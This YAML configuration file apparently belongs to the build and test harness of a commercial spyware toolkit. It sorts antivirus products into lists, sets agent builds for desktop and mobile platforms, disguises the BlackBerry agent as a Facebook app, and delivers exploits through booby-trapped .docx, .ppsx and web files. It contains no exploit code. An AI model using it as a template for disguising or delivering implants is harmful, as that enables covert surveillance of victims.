
soldierlist: [iobit32,bitdef,comodo,gdata,drweb,360cn,360cn5,kis32,avg,avg32]
blacklist: [emsisoft,sophos]

crop_whitelist: [kis,kis32]

backend: 192.168.100.201
frontend: 172.20.100.204

nointernetcheck: [zanzara.local, win7zenoav, win7-noav, paradox, avtagent, funff, funie, funch, funwin81]

build_parameters:
        linux:
          platform_type: desktop
          binary: {admin: false, demo: false}
          melt: {}
          platform: linux
          package: {}
        osx:
          platform_type: desktop
          binary: {admin: true, demo: false}
          melt: {}
          platform: osx
          package: {}
        windows:
          platform_type: desktop
          binary: {admin: false, demo: false}
          melt: {admin: false, bit64: true, codec: true, scout: true}
          platform: windows
          meltfile: assets/windows/meltapp.exe
          sign: {}
          package: {}
        windows_elite:
          platform_type: desktop
          binary: {admin: false, demo: false}
          melt: {admin: false, bit64: true, codec: true, scout: false}
          platform: windows
          meltfile: assets/windows/meltapp.exe
          sign: {}
          package: {}
        windows_soldier:
          platform_type: desktop
          binary: {admin: false, demo: false}
          melt: {admin: false, bit64: true, codec: true, scout: false, soldier: true}
          platform: windows
          meltfile: assets/windows/meltapp.exe
          sign: {}
          package: {}
        winphone:
          platform_type: desktop
          binary: {admin: true, demo: false}
          melt: {}
          platform: winphone
          package: {}
        android:
          platform_type: mobile
          binary: {admin: false, demo: false}
          melt: {}
          platform: android
          sign: {}
          package: {}
        blackberry:
          platform_type: mobile
          binary: {demo: false}
          melt: {appname: facebook, desc: Applicazione utilissima di social network, name: Facebook
              Application, vendor: face inc, version: 1.2.3}
          package: {type: local}
          platform: blackberry
        ios:
          platform_type: mobile
          binary: {demo: false}
          melt: {}
          platform: ios
          package: {type: local}
        exploit:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: assets/windows/meltexploit.txt
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: txt, filename: example.txt, input: '000'}
          platform: exploit
          package: {}
        exploit_docx:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile : assets/windows/meltexploit.docx
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2013-002
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: APPNAME, filename: example.docx, input: '000', url: 'http://HOSTNAME/APPNAME'}
          platform: exploit
          package: {}
        exploit_ppsx:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: assets/windows/meltexploit.ppsx
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2013-003
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: APPNAME, filename: example.ppsx, input: '000', url: 'http://HOSTNAME/APPNAME'}
          platform: exploit
          package: {}
        exploit_web:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile : assets/windows/meltexploit.docx
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2013-002
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: APPNAME, filename: example.docx, input: '000', url: 'http://HOSTNAME/APPNAME'}
          platform: exploit
          package: {}
